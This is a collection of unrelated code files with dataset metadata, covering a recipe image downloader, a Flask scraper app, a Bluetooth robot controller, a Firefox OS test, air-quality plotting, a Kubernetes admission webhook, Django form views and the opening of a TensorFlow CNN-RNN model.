+{"seq_id":"325170688","text":"\nimport json\nimport gzip\nimport sys\nfrom PIL import Image, ImageFilter\nimport requests\nfrom io import BytesIO\nimport os.path\nimport time\n\nrecipes_without_image_file = 'recipe_without_image.txt'\n\n\nwith gzip.open('merged_edeka.json.gz') as zipfile:\n json_file = json.load(zipfile)\n\nfor idx, recipe in enumerate(json_file[\"recipes\"]):\n seoTitle = recipe[\"seoTitle\"]\n filename_small = f'../static/images/recipe/{seoTitle}_small.jpg'\n filename_big = f'../static/images/recipe/{seoTitle}_big.jpg'\n if not os.path.exists(filename_small):\n # 480px width\n picture_small = recipe[\"media\"][\"images\"][\"ratio_1:1\"][\"url\"][\"medium\"]\n response = requests.get(picture_small)\n if response.status_code == 404:\n with open(recipes_without_image_file, 'a') as f:\n f.write(f'{recipe[\"seoTitle\"]}\\n')\n continue\n with 
open(filename_small, 'wb') as f:\n f.write(response.content)\n time.sleep(1)\n \n if not os.path.exists(filename_big):\n # 768px width\n # if recipe[\"media\"][\"images\"][\"ratio_16:9\"]:\n # picture_big = recipe[\"media\"][\"images\"][\"ratio_16:9\"][\"url\"][\"mediumLarge\"]\n # response = requests.get(picture_big)\n # with open(filename_big, 'wb') as f:\n # f.write(response.content)\n # time.sleep(2)\n # else:\n #Open existing image\n image_org = Image.open(filename_small)\n image_big = image_org.resize((768,768))\n image_org = image_org.resize((432,432))\n image_big = image_big.filter(ImageFilter.GaussianBlur(8))\n image_big.paste(image_org, ((int)(768/2-432/2), (int)(768/2-432/2)))\n area = (0, int((768-432)/2), 768, 432+int((768-432)/2))\n image_big = image_big.crop(area)\n image_big.save(filename_big, \"JPEG\")\n print(f'recipe {idx}/{len(json_file[\"recipes\"])}')\nprint(\"done\")\n \n","sub_path":"import/02_download_recipe_images.py","file_name":"02_download_recipe_images.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"112095249","text":"from flask import Flask, render_template, request\nimport scraper_func\napp = Flask(__name__)\n\n@app.route('/')\ndef url_entry():\n return render_template('url_entry.html')\n\n@app.route('/links', methods = ['POST', 'GET'])\ndef links():\n if request.method == 'POST':\n url = request.form['url']\n output = scraper_func.scraper(url)\n return render_template(\"links.html\", result = output)\n\n if request.method == 'GET':\n return \"Go back to http://127.0.0.1:5000/\"","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"366790469","text":"import msvcrt\nimport struct\nfrom twisted.internet import task\nfrom twisted.internet import reactor\nimport bluetooth\n\ndef getKey():\n '''\n Get the key code of the key that is being held down,\n otherwise return False\n '''\n if msvcrt.kbhit():\n return ord(msvcrt.getch()) #Return the key code\n else:\n return False\n\ndef sendCommand(sock, command):\n '''\n Given a socket + command, and assuming that the command is an int\n Will convert int to bytes and send to socket\n '''\n print(command)\n sock.send(command.to_bytes(1, byteorder='big'))\n\ndef mainLoop(sock, keyDict):\n keyCode = getKey()\n command = keyDict.get(keyCode, False)\n if command == -1:\n print(\"Exit\")\n reactor.stop()\n elif command:\n print(command)\n sendCommand(sock, command) \n else:\n pass\n\n#KEY CODES\nESC = 27\nSPECIAL_KEYS = 224\n\n#8 Directional\nQCODE = 113\nWCODE = 119\nECODE = 101\nACODE = 97\nDCODE = 100\nZCODE = 122\nXCODE = 120\nCCODE = 99\n\n\"\"\"\n4 bit representations of directions\n1000 = UP == 8\n0100 = DOWN == 4\n0010 = RIGHT == 2\n0001 = LEFT == 1\nCan also be combined\n1010 = UP + RIGHT == 10\nWill use bitwise operations in arduino program to determine how to turn\n\"\"\"\n#This dictionary maps key codes to binary representations\ncommandMap = {\n QCODE: 9,\n WCODE: 8,\n ECODE: 10,\n ACODE: 1,\n DCODE: 2,\n ZCODE: 5,\n XCODE: 4,\n CCODE: 6,\n ESC: -1\n }\n\nrefreshInterval = .1 #Seconds\nHC06Address = r\"98:D3:31:F6:04:C8\"\nport = 1 #I'm not quite sure what port this is referring to, but it works...\ntry:\n sock=bluetooth.BluetoothSocket( bluetooth.RFCOMM )\n sock.connect((HC06Address, port))\n print(\"Connection to {0} established\".format(HC06Address))\n l = 
task.LoopingCall(lambda: mainLoop(sock, commandMap))\n l.start(refreshInterval)\n reactor.run()\nexcept:\n print(\"Connection to {0} failed\".format(HC06Address))","sub_path":"Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"289301268","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom marionette import Wait\n\nfrom mtbf_driver.MtbfTestCase import GaiaMtbfTestCase\nfrom gaiatest.apps.search.app import Search\nfrom mtbf_driver.mtbf_apps.settings.app import MTBF_Settings\n\n\nclass TestBrowserClearHistory(GaiaMtbfTestCase):\n\n def setUp(self):\n GaiaMtbfTestCase.setUp(self)\n self.data_layer.enable_wifi()\n self.connect_to_local_area_network()\n\n self.test_url = self.marionette.absolute_url('mozilla.html')\n\n def test_browser_clear_history(self):\n \"\"\"\n https://moztrap.mozilla.org/manage/cases/?filter-id=3582\n \"\"\"\n search = Search(self.marionette)\n search.launch()\n browser = search.go_to_url(self.test_url)\n browser.switch_to_content()\n Wait(self.marionette).until(lambda m: m.title == 'Mozilla')\n\n self.device.touch_home_button()\n\n search.launch()\n Wait(self.marionette).until(lambda m: search.history_items_count > 0)\n self.assertGreater(search.history_items_count, 0)\n\n settings = MTBF_Settings(self.marionette)\n settings.launch()\n settings.go_back()\n browsing_privacy = settings.open_browsing_privacy_settings()\n\n browsing_privacy.tap_clear_browsing_history()\n browsing_privacy.tap_clear()\n\n self.device.touch_home_button()\n search.launch()\n search.wait_for_history_to_load(number_of_items=0)\n self.assertEqual(0, search.history_items_count)\n\n def tearDown(self):\n self.data_layer.disable_cell_data()\n GaiaMtbfTestCase.tearDown(self)\n","sub_path":"mtbf_driver/tests/mtbf/browser/test_mtbf_browser_clear_browsing_history.py","file_name":"test_mtbf_browser_clear_browsing_history.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"318982952","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 21 10:55:23 2018\r\n\r\n@author: s1731217\r\n\"\"\"\r\n\r\n# =============================================================================\r\n# Plotting\r\n# =============================================================================\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as mpatches\r\n#import openpyxl\r\nimport xlrd\r\nfrom matplotlib.dates import DateFormatter, MonthLocator, WeekdayLocator, DayLocator, MONDAY, YEARLY\r\nimport matplotlib.dates as dates\r\nfrom pylab import *\r\nimport numpy as np\r\nimport iris\r\n\r\n# =============================================================================\r\n# loading data (excel)\r\n# =============================================================================\r\ndata = xlrd.open_workbook('/exports/csce/datastore/geos/users/s1731217/output_ukca/u-av256/plotting_scripts/model_evaluation/2014_06_total.xlsx')\r\n\r\n#data = xlrd.open_workbook('Z:/output_ukca/observation/beijing/test.xlsx')\r\ntable1 = data.sheet_by_name('PM2.5')\r\n\r\n#\r\ny_no2_beijing = table1.col_values(0)[1:] \r\ny_no2_shijiazhuang = table1.col_values(1)[1:] \r\ny_no2_shanghai = table1.col_values(2)[1:] 
\r\ny_no2_nanjing = table1.col_values(3)[1:] \r\ny_no2_guangzhou = table1.col_values(4)[1:] \r\ny_no2_hongkong = table1.col_values(5)[1:] \r\n\r\n#x_cn = range(1, 745), for 31d; if for June (30d), it is range(1,721)\r\n#x_utc = range (10, 754)\r\n#example: UTC time: 00:30, China time: 08:30\r\nx_cn = np.arange(1.5, 721.5)\r\nx_utc = np.arange(9.5, 729.5)\r\n# =============================================================================\r\n# loading data (cube); u-av256: nudged; u-av257: non-nudged\r\n# =============================================================================\r\nfilename_no2 = '/exports/csce/datastore/geos/users/s1731217/output_ukca/u-av257/dumped_pp_files/June/pm2.5.pp' # pm1\r\nfilename2_no2 = '/exports/csce/datastore/geos/users/s1731217/output_ukca/u-av256/dumped_pp_files/June/pm2.5.pp' # pm1 (nudging)\r\n\r\ncube_no2 = iris.load(filename_no2) \r\ncube2_no2 = iris.load(filename2_no2) #cube2: nudging\r\n\r\n# unit: ug/m3\r\ncube_no2_unit_beijing = cube_no2[0]*1.185*1.0e9\r\ncube_no2_unit_shijiazhuang = cube_no2[0]*1.181*1.0e9\r\ncube_no2_unit_shanghai = cube_no2[0]*1.185*1.0e9\r\ncube_no2_unit_nanjing = cube_no2[0]*1.185*1.0e9\r\ncube_no2_unit_guangzhou = cube_no2[0]*1.169*1.0e9\r\ncube_no2_unit_hk = cube_no2[0]*1.169*1.0e9\r\n\r\n#nudged data : unit2\r\ncube_no2_unit2_beijing = cube2_no2[0]*1.185*1.0e9\r\ncube_no2_unit2_shijiazhuang= cube2_no2[0]*1.181*1.0e9\r\ncube_no2_unit2_shanghai = cube2_no2[0]*1.185*1.0e9\r\ncube_no2_unit2_nanjing = cube2_no2[0]*1.185*1.0e9\r\ncube_no2_unit2_guangzhou = cube2_no2[0]*1.169*1.0e9\r\ncube_no2_unit2_hk = cube2_no2[0]*1.169*1.0e9\r\n\r\ncube_beijing_no2 = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit_beijing, [('latitude', 39.90), ('longitude', 116.41)])\r\ncube_shijiazhuang_no2 = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit_shijiazhuang, [('latitude', 38.04), ('longitude', 114.51)])\r\ncube_shanghai_no2 = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit_shanghai, [('latitude', 31.23), ('longitude', 121.47)])\r\ncube_nanjing_no2 = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit_nanjing, [('latitude', 32.06), ('longitude', 118.80)])\r\ncube_guangzhou_no2 = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit_guangzhou, [('latitude', 23.13), ('longitude', 113.26)])\r\ncube_hongkong_no2 = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit_hk, [('latitude', 22.33), ('longitude', 114.19)])\r\n\r\ncube_beijing_no2_nudge = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit2_beijing, [('latitude', 39.90), ('longitude', 116.41)])\r\ncube_shijiazhuang_no2_nudge = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit2_shijiazhuang, [('latitude', 38.04), ('longitude', 114.51)])\r\ncube_shanghai_no2_nudge = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit2_shanghai, [('latitude', 31.23), ('longitude', 121.47)])\r\ncube_nanjing_no2_nudge = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit2_nanjing, [('latitude', 32.06), ('longitude', 118.80)])\r\ncube_guangzhou_no2_nudge = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit2_guangzhou, [('latitude', 23.13), ('longitude', 113.26)])\r\ncube_hongkong_no2_nudge = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit2_hk, [('latitude', 22.33), ('longitude', 114.19)])\r\n\r\n# =============================================================================\r\n# PM1 (model) & PM2.5 (obs) plotting\r\n# 
=============================================================================\r\n#beijing\r\nplt.figure(figsize=(24, 15), facecolor='white')\r\npic = plt.subplot(6,1,1)\r\nbeijing_no2 = pic.plot(x_utc, cube_beijing_no2.data, linewidth=4, color = 'k')\r\nbeijing_no2_nudging = pic.plot(x_utc, cube_beijing_no2_nudge.data, linewidth=4, color = 'sienna')\r\nobs_no2 = pic.plot(x_cn, y_no2_beijing, linewidth = 4, label = 'OBS', color = 'red')\r\n\r\nticks = np.arange(1, 721, 24) \r\nlabels = range (1, 31)\r\npic.set_xticks(ticks)\r\npic.set_xticklabels(labels)\r\n#plt.title('NO2 in Beijing (10/11-10/12) 2014')\r\n#plt.xlabel('Day')\r\nplt.ylabel(' PM Beijing')\r\n#plt.legend(loc = 1)\r\n#red_patch1 = mpatches.Patch(color='red', label='Beijing')\r\n#plt.legend(handles=[red_patch1])\r\n\r\nplt.grid(linestyle = '--')\r\n# pic.set_xticklabels(day_list)\r\n\r\nfor label in pic.get_xticklabels():\r\n label.set_rotation(45)\r\n\r\n#shijiazhuang \r\npic = plt.subplot(6,1,2)\r\nshijiazhuang_no2 = pic.plot(x_utc, cube_shijiazhuang_no2.data, linewidth=4, color = 'k')\r\nshijiazhuang_no2_nudging = pic.plot(x_utc, cube_shijiazhuang_no2_nudge.data, linewidth=4, color = 'sienna')\r\nobs_no2 = pic.plot(x_cn, y_no2_shijiazhuang, linewidth = 4, label = 'OBS', color = 'red')\r\n\r\nticks = np.arange(1, 721, 24) \r\nlabels = range (1, 31)\r\npic.set_xticks(ticks)\r\npic.set_xticklabels(labels)\r\n#plt.title('NO2 in shijiazhuang (10/11-10/12) 2014')\r\n#plt.xlabel('Day')\r\nplt.ylabel(' PM Shijiazhuang')\r\n#plt.legend(loc = 1)\r\n\r\nplt.grid(linestyle = '--')\r\n# pic.set_xticklabels(day_list)\r\n#red_patch2 = mpatches.Patch(color='red', label='Shijiazhuang')\r\n#plt.legend(handles=[red_patch2])\r\n\r\nfor label in pic.get_xticklabels():\r\n label.set_rotation(45)\r\n\r\n#shanghai \r\npic = plt.subplot(6,1,3)\r\nshanghai_no2 = pic.plot(x_utc, cube_shanghai_no2.data, linewidth=4, color = 'k')\r\nshanghai_no2_nudging = pic.plot(x_utc, cube_shanghai_no2_nudge.data, linewidth=4, color = 'sienna')\r\nobs_no2 = pic.plot(x_cn, y_no2_shanghai, linewidth = 4, label = 'OBS', color = 'red')\r\n\r\nticks = np.arange(1, 721, 24) \r\nlabels = range (1, 31)\r\npic.set_xticks(ticks)\r\npic.set_xticklabels(labels)\r\n#plt.title('NO2 in shanghai (10/11-10/12) 2014')\r\n#plt.xlabel('Day')\r\nplt.ylabel(' PM Shanghai')\r\n#plt.legend(loc = 1)\r\n#red_patch3 = mpatches.Patch(color='red', label='Shanghai')\r\n#plt.legend(handles=[red_patch3])\r\n\r\nplt.grid(linestyle = '--')\r\n# pic.set_xticklabels(day_list)\r\n\r\nfor label in pic.get_xticklabels():\r\n label.set_rotation(45)\r\n\r\n#nanjing \r\npic = plt.subplot(6,1,4)\r\nnanjing_no2 = pic.plot(x_utc, cube_nanjing_no2.data, linewidth=4, color = 'k')\r\nnanjing_no2_nudging = pic.plot(x_utc, cube_nanjing_no2_nudge.data, linewidth=4, color = 'sienna')\r\nobs_no2 = pic.plot(x_cn, y_no2_nanjing, linewidth = 4, label = 'OBS', color = 'red')\r\n\r\nticks = np.arange(1, 721, 24) \r\nlabels = range (1, 31)\r\npic.set_xticks(ticks)\r\npic.set_xticklabels(labels)\r\n#plt.title('NO2 in nanjing (10/11-10/12) 2014')\r\n#plt.xlabel('Day')\r\nplt.ylabel(' PM Nanjing')\r\n#plt.legend(loc = 1)\r\n#red_patch4 = mpatches.Patch(color='red', label='Nanjing')\r\n#plt.legend(handles=[red_patch4])\r\n\r\nplt.grid(linestyle = '--')\r\n# pic.set_xticklabels(day_list)\r\n\r\nfor label in pic.get_xticklabels():\r\n label.set_rotation(45)\r\n \r\n#guangzhou\r\npic = plt.subplot(6,1,5)\r\nguangzhou_no2 = pic.plot(x_utc, cube_guangzhou_no2.data, linewidth=4, color = 'k')\r\nguangzhou_no2_nudging = pic.plot(x_utc, 
cube_guangzhou_no2_nudge.data, linewidth=4, color = 'sienna')\r\nobs_no2 = pic.plot(x_cn, y_no2_guangzhou, linewidth = 4, label = 'OBS', color = 'red')\r\n\r\nticks = np.arange(1, 721, 24) \r\nlabels = range (1, 31)\r\npic.set_xticks(ticks)\r\npic.set_xticklabels(labels)\r\n#plt.title('NO2 in guangzhou (10/11-10/12) 2014')\r\n#plt.xlabel('Day')\r\nplt.ylabel(' PM Guangzhou')\r\n#plt.legend(loc = 1)\r\n#red_patch5 = mpatches.Patch(color='red', label='Guangzhou')\r\n#plt.legend(handles=[red_patch5])\r\n\r\nplt.grid(linestyle = '--')\r\n# pic.set_xticklabels(day_list)\r\n\r\nfor label in pic.get_xticklabels():\r\n label.set_rotation(45)\r\n\r\n#hongkong\r\npic = plt.subplot(6,1,6)\r\nhongkong_no2 = pic.plot(x_utc, cube_hongkong_no2.data, linewidth=4, label = 'Model: PM1 (ug/m3)', color = 'k')\r\nhongkong_no2_nudging = pic.plot(x_utc, cube_hongkong_no2_nudge.data, linewidth=4, label = 'Nudged Model: PM1 (ug/m3) ', color = 'sienna')\r\nobs_no2 = pic.plot(x_cn, y_no2_hongkong, linewidth = 4, label = 'Obs PM2.5 (ug/m3) in June', color = 'red')\r\n\r\nticks = np.arange(1, 721, 24) \r\nlabels = range (1, 31)\r\npic.set_xticks(ticks)\r\npic.set_xticklabels(labels)\r\n#plt.title('NO2 (10/11-10/12) 2014')\r\n#plt.xlabel('Day')\r\nplt.ylabel(' PM Hong Kong')\r\n#plt.legend(loc = 1)\r\n#red_patch = mpatches.Patch(color='red', label='HongKong')\r\n#plt.legend(handles=[red_patch])\r\n\r\nplt.grid(linestyle = '--')\r\n# pic.set_xticklabels(day_list)\r\n\r\nfor label in pic.get_xticklabels():\r\n label.set_rotation(45) \r\n \r\n#label\r\n#plt.legend(bbox_to_anchor=(0.03, -0.09, 0.9, -0.09), ncol= 4, mode=\"expand\") # bbox_to_anchor=(x0, y0, x, y) \r\nplt.legend(bbox_to_anchor=(0.1, -0.09, 0.8, -0.09), ncol= 4, mode=\"expand\") # bbox_to_anchor=(x0, y0, x, y) \r\n\r\n#plt.tight_layout()\r\nplt.subplots_adjust(left=0.06, bottom=0.1, right=0.94, top=0.95, hspace=0.2, wspace=0.2)\r\nplt.savefig('/exports/csce/datastore/geos/users/s1731217/output_ukca/u-av256/plotting_scripts/model_evaluation/model_evaluation_pm.png', dpi=600, transparent=True)\r\nplt.show()\r\n","sub_path":"u-av256/plotting_scripts/model_evaluation/model_evaluation_pm.py","file_name":"model_evaluation_pm.py","file_ext":"py","file_size_in_byte":10033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"350511134","text":"from flask import Flask, request, jsonify\nadmission_controller = Flask(__name__)\n@admission_controller.route('/validate/deployments', methods=['POST'])\ndef deployment_webhook():\n request_info = request.get_json()\n if request_info[\"request\"][\"object\"][\"metadata\"][\"labels\"].get(\"allow\"):\n return admission_response(True, \"Allow label exists\")\n return admission_response(False, \"Not allowed without allow label\")\ndef admission_response(allowed, message):\n return jsonify({\"response\": {\"allowed\": allowed, \"status\": {\"message\": message}}})\nif __name__ == '__main__':\n admission_controller.run(host='0.0.0.0', port=443, ssl_context=(\"server.crt\", \"server.key\"))","sub_path":"validating_controller/image/admission_controller.py","file_name":"admission_controller.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"335308857","text":"#ME\r\n\r\nclass Solution:\r\n def uncommonFromSentences(self, A: str, B: str) -> List[str]:\r\n d={}\r\n a=[]\r\n A=A.split(' ')\r\n B=B.split(' ')\r\n for s in A:\r\n d[s]=d.get(s,0)+1\r\n for s in B:\r\n d[s]=d.get(s,0)+1\r\n for 
key,value in d.items():\r\n if value==1:\r\n a.append(key)\r\n return a","sub_path":"leetcode_solution/leetcode类别/10.1哈希/简单/884. 两句话中的不常见单词.py","file_name":"884. 两句话中的不常见单词.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103960368","text":"from __future__ import print_function\nimport goslate\nimport sys\ngs=goslate.Goslate()\ndef phrase_wise(filePath):\n a=open(filePath,\"r\").read()\n lines = a.splitlines()\n need = []\n for i in lines:\n if len(i)>0:\n if not(i[0].isdigit()):\n need.append(i)\n return need\n\ndef word_wise(filePath):\n a=open(filePath,\"r\").read()\n lines = a.splitlines()\n need = []\n for i in lines:\n if len(i)>0:\n if not i[0].isdigit():\n \tfor j in i.split():\n \t need.append(i+\" \")\n return need\n\ndef fullSentence_wise(filePath):\n a=open(filePath,\"r\").read()\n lines = a.splitlines()\n need = \"\"\n for i in lines:\n need = need + i + \" \"\n return [need]\n\ndef translate(need,langid):\n translated=[]\n for i in need:\n translated.append(gs.translate(i,langid))\n return translated\n\nprint(sys.argv[1][:-4])\n#print phrase_wise(sys.argv[0])\nfp = open(\"result_phrase.txt\",\"w\")\nfor i in phrase_wise(sys.argv[1]):\n if i[0]!='<':\n print((translate([i],sys.argv[2])[0].encode('utf-8')),file=fp)\nfp.close()\nfp2 = open(\"result_sentence.txt\",\"w\")\nfor i in fullSentence_wise(sys.argv[1]):\n if i[0]!='<':\n print((translate([i],sys.argv[2])[0].encode('utf-8')),file=fp2)\nfp2.close()\nfp3 = open(\"result_word.txt\",\"w\")\nfor i in word_wise(sys.argv[1]):\n if i[0]!='<':\n print((translate([i],sys.argv[2])[0].encode('utf-8')),file=fp3)\nfp3.close()\n\nexit()\n\n","sub_path":"methodAnalysis/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"2650559","text":"base = 9\ndigits = []\nfor i in range(2,1000):\n digits.append(i)\n for j in range (i,1000,i):\n num = j\n result = 0\n while num >= 1:\n result += int(num % base)\n num = int(num / base)\n if result % i != 0:\n print(digits)\n digits.pop()\n break\n\nprint(digits)\n\n","sub_path":"Topcoder Python/전체탐색/InterestingDigits.py","file_name":"InterestingDigits.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"227821389","text":"from talentos.models import Area, FormularioConhecimento\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, render_to_response\nfrom django.core.context_processors import csrf\nfrom django.conf import settings\n\nclass no_arvore:\n nome = 'nomeArea'\n agrupador = False\n filhos = []\n def __unicode__(self):\n return self.nome\n\ndef gerar_formulario_conhecimento(noPai = None):\n if noPai:\n areas = Area.objects.filter(pai = Area.objects.get(nome=noPai)).order_by('agrupador')\n else:\n areas = Area.objects.filter(pai = None).order_by('agrupador')\n\n lista = []\n for area in areas:\n # import logging\n # logging.debug(noPai)\n if area.agrupador:\n # logging.debug('agrupador')\n # logging.debug(area.nome)\n if Area.objects.filter(pai = Area.objects.get(nome=area.nome)):\n no = no_arvore()\n no.nome = area.nome\n no.agrupador = True\n no.filhos = gerar_formulario_conhecimento(area.nome)\n lista.append(no)\n else:\n no = no_arvore()\n no.nome = area.nome\n 
no.agrupador = False\n no.filhos = []\n lista.append(no)\n return lista\n\ndef renderizar_formulario_conhecimento(lista, request):\n texto = ''\n\n if lista != []:\n for item in lista:\n if item.agrupador:\n texto += '\\n'\n texto += '\\n
' + item.nome + ''\n texto += '\\n'\n texto += '\\n'\n texto += '\\n'\n texto += '\\n'\n texto += renderizar_formulario_conhecimento(item.filhos, request)\n texto += '\\n
Nao conhecoOuvi falarNocoes minimasConhecimento BasicoConhecimento intermediarioConhecimento avancado
'\n texto += '\\n
'\n texto += '\\n'\n else:\n texto += '\\n' + item.nome +''\n for i in range(0,6):\n existe = ''\n testearea = Area.objects.get(nome=item.nome)\n verificador = FormularioConhecimento()\n try:\n verificador = FormularioConhecimento.objects.get(area = testearea, usuario = request.user, nivel = i)\n except:\n pass\n if (verificador.nivel != None):\n existe = 'checked'\n\n import logging\n logging.debug(verificador.nivel)\n logging.debug(i)\n logging.debug(testearea)\n logging.debug(request.user)\n logging.debug(existe)\n logging.debug('######################')\n texto += ''\n texto += ''\n return texto\n\n@login_required \ndef exibir_formulario_conhecimento(request):\n\n MEDIA_URL = settings.MEDIA_URL\n\n formulario = gerar_formulario_conhecimento()\n renderizado = renderizar_formulario_conhecimento(formulario, request)\n\n #import logging\n #logging.debug('###########################################')\n #logging.debug(formulario)\n #logging.debug('-------------------------------------------')\n #logging.debug(renderizado)\n \n return render_to_response(\"informacoes/base.html\", {'form': renderizado, 'MEDIA_URL': MEDIA_URL})\n\n\n\ndef executar_formulario_conhecimento(request):\n ''' no model:\n verficiar loop infinito\n verificar se ja existe entrada do mesmo usuario\n '''\n \n MEDIA_URL = settings.MEDIA_URL\n\n if (request.user.is_authenticated() == False):\n return render_to_response(\"informacoes/base.html\", {'erro':'Falha ao verificar usuario.', 'MEDIA_URL':MEDIA_URL})\n\n formulario = request.POST\n\n for conhecimento in formulario:\n if conhecimento == u'csrfmiddlewaretoken':\n continue\n nConhecimento = formulario[conhecimento]\n nivel = 0\n if nConhecimento == u'1':\n nivel = 1\n if nConhecimento == u'2':\n nivel = 2\n if nConhecimento == u'3':\n nivel = 3\n if nConhecimento == u'4':\n nivel = 4\n if nConhecimento == u'5':\n nivel = 5\n resposta = FormularioConhecimento(\n area = Area.objects.get(nome=conhecimento),\n usuario = request.user,\n nivel = nivel\n )\n\n #import logging\n #logging.debug(\"##################\")\n #logging.debug(resposta.pk)\n #logging.debug(resposta.area)\n #logging.debug(resposta.usuario)\n #logging.debug(resposta.nivel)\n \n entrada_banco = None\n\n try:\n entrada_banco = FormularioConhecimento.objects.get(area = Area.objects.get(nome=conhecimento), usuario = request.user)\n except:\n pass\n \n if ( entrada_banco != None):\n entrada_banco.nivel = resposta.nivel\n entrada_banco.save()\n else:\n resposta.save()\n message = 'Formulario enviado com sucesso'\n return render_to_response(\"informacoes/resultado.html\", locals())\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"385950126","text":"# -*- coding: UTF-8 -*- \n'''\nAuthorized by Vlon Jang\nCreated on 2017-03-02 \nBlog: www.wangqingbaidu.cn\nEmail: wangqingbaidu@gmail.com\nFrom kwai, www.kuaishou.com\n©2015-2017 All Rights Reserved.\n'''\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\n\nimport tensorflow as tf\nfrom tensorflow.python.ops import math_ops\n\nlogger = logging.getLogger('CNN-RNN Model')\nlogging.basicConfig(\n format=\"[%(asctime)s - %(filename)s:line %(lineno)4s] %(message)s\",\n datefmt='%d %b %H:%M:%S')\nlogger.setLevel(logging.INFO)\n\nclass CNNRNNModel(object):\n \"\"\"\n The Visual features fixed with RNN model. 
\n Use CNN features from pre-trained model like vgg or googlenet.\n RNN unit type is optional.\n \n Parameters\n ---------------\n @is_training: Generate this model for training or for inferencing.\n @config: Configurations of this model which contains hyperparameters.\n @num_steps: Max labels of each sample.\n @flag_with_saver: Use saver of not, default False.\n @flag_reset_state: Whether to reset RNN state or not, default False.\n \n Public Methods\n ---------------\n @assign_lr: Assign learning rate.\n parmas: sess, value\n return None\n \"\"\"\n\n def __init__(self, is_training, config, scope, reuse,\n num_steps = None,\n flag_with_saver=False,\n flag_reset_state=False):\n \n self.batch_size = batch_size = config.batch_size\n if not num_steps:\n self.num_steps = num_steps = config.num_steps\n else:\n self.num_steps = num_steps\n \n rnn_size = config.rnn_size\n emb_size = config.emb_size\n vocab_size = config.vocab_size\n vf_size = config.vf_size\n# const_scale = tf.constant([1, 1, emb_size])\n \n # Add CNN model\n # inception_v3(scope='CNN')\n \n with tf.variable_scope(tf.get_variable_scope(), reuse=reuse):\n # Inputs to the model\n self._input_data = tf.placeholder(tf.int32, [batch_size, num_steps])\n self._input_data_scale = tf.placeholder(tf.float32, [batch_size, num_steps])\n self._targets = tf.placeholder(tf.int32, [batch_size, num_steps])\n self._visual_features = tf.placeholder(tf.float32, [batch_size, vf_size])\n self._valid_flags = tf.placeholder(tf.float32, [batch_size, num_steps])\n self._seq_lens = tf.placeholder(tf.int32, [batch_size])\n \n # Create rnn cell\n if config.rnn_type == 'GRU':\n rnn_cell_basic = tf.contrib.rnn.GRUCell(rnn_size)\n elif config.rnn_type == 'LSTM':\n rnn_cell_basic = tf.contrib.rnn.LSTMCell(rnn_size, use_peepholes=True)\n else:\n raise NameError(\"Unknown rnn type %s!\" % config.rnn_type)\n \n # Dropout if configured\n if is_training and config.keep_prob_rnn < 1:\n rnn_cell_basic = tf.contrib.rnn.DropoutWrapper(\n rnn_cell_basic, output_keep_prob=config.keep_prob_rnn)\n \n cell = tf.contrib.rnn.MultiRNNCell([rnn_cell_basic] * config.num_rnn_layers)\n state_size = cell.state_size\n \n # Create word embedding\n # WARNIJNG: Take care of label \n self._embedding = embedding = tf.get_variable(\"embedding\", [vocab_size, emb_size])\n # embedding all input_data to a tensor list\n inputs = tf.nn.embedding_lookup(embedding, self._input_data)\n \n # Expand tensor dim\n# scale = tf.tile(tf.expand_dims(self._input_data_scale, axis = -1), const_scale)\n# inputs = tf.multiply(embedding_out, scale)\n\n if is_training and config.keep_prob_emb < 1:\n inputs = tf.nn.dropout(inputs, config.keep_prob_emb)\n \n # Different ways to use text and visual information\n if config.multimodal_type == 'mrnn':\n mm_size = config.mm_size\n # Run RNNs\n if flag_reset_state:\n initial_state = (tf.placeholder(tf.float32, [batch_size, state_size[0]]), )\n self._initial_state = initial_state\n else:\n self._initial_state = initial_state = cell.zero_state(batch_size, tf.float32)\n \n inputs = [tf.squeeze(input_, [1])\n for input_ in tf.split(inputs, num_steps, 1)]\n outputs_rnn, state = tf.contrib.rnn.static_rnn(cell, inputs, \n initial_state = initial_state,\n sequence_length = self._seq_lens)\n self._final_state = state\n output_rnn = 